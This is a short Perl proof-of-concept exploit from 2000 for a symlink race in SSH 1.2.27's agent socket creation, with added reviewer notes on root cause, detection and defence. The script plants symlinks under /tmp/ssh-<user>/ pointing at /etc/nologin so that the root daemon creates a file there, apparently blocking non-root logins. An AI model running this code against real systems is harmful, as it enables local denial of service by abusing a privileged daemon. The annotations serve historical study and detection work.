#!/usr/bin/perl
#
# vulnerable: SSH 1.2.27
#
# A vulnerability in SSH's creation of the authentication
# agent UNIX domain socket allows local users to create a
# UNIX domain socket with an arbitrary file name in the
# system.
#
# SSH has the concept of authentication proxying via the
# SSH authentication agent. It allows for a basic kind of
# Single Sign-On capability. The sshd daemon, ssh and ssh
# -agent communicate via a UNIX domain socket normally of
# the form '/tmp/ssh-/agent-socket-'.
#
# SSH follows symbolic links while creating the socket as
# root thus allowing any local users with ssh access to
# create a socket with an arbitrary filename in the
# system.
#
# Notice that this will not work under all operating
# systems. Some operating systems do not follow symbolic
# links during bind on UNIX domain sockets. Linux 2.0.x,
# Solaris 2.5.1 and IRIX 6.5.2 do not follow symbolic
# links during bind(2). Linux 2.1.x does.
#
# Reviewer notes (defender's view):
# - Historical proof of concept (dated 2000) against SSH 1.2.27 only. By
#   itself it yields a root-created socket at a path the local user chose;
#   the chosen target here is /etc/nologin, which on many systems blocks
#   non-root logins while present -- a denial-of-service outcome. That
#   effect is not shown by this page and should be confirmed per platform.
# - Root cause: a privileged daemon creates an object under a predictable,
#   user-writable directory (/tmp/ssh-<user>/) and bind(2) follows a
#   symlink planted there beforehand. The generic defence is the usual
#   one for /tmp races: create privileged objects only in a directory
#   verified (after creation, via the opened handle) to be owned by the
#   expected user, mode 0700, with no symlink following on the final path.
# - Detection: a /tmp/ssh-<user> directory holding a run of
#   "ssh-<pid>-agent" symlinks that all point at one sensitive path is a
#   clear indicator of this technique; the socket name pattern in the
#   header text ('agent-socket-') differs from the one the code uses
#   ('ssh-<pid>-agent') -- possibly a copy artifact, so match on both.
# - The script runs without strict/warnings and uses package globals
#   throughout; left byte-identical as a historical record.

# Pid of this script. The daemon names its socket after its own pid,
# which is not known here, so a range of nearby pids is covered below.
$pid = $$;
# Current user name via a shell child. NOTE(review): relies on PATH;
# getpwuid($<) would give the same answer without spawning a shell.
$whoami = `whoami`;
chop($whoami);
# Directory in which the agent socket is normally created (see header
# text). Created 0700 so only this user can enter it; the return value
# of mkdir is not checked, so an existing directory is silently reused.
mkdir("/tmp/ssh-$whoami", 0700);
# Plant one symlink per candidate pid (this pid and the next 49), each
# pointing at /etc/nologin, so that whichever pid the daemon gets, its
# bind(2) on the socket path is redirected to the link target.
# symlink's return value is not checked either.
for ($i = $pid; $i < $pid+50; $i++) {
    symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}
# www.hack.co.za [23 May 2000]#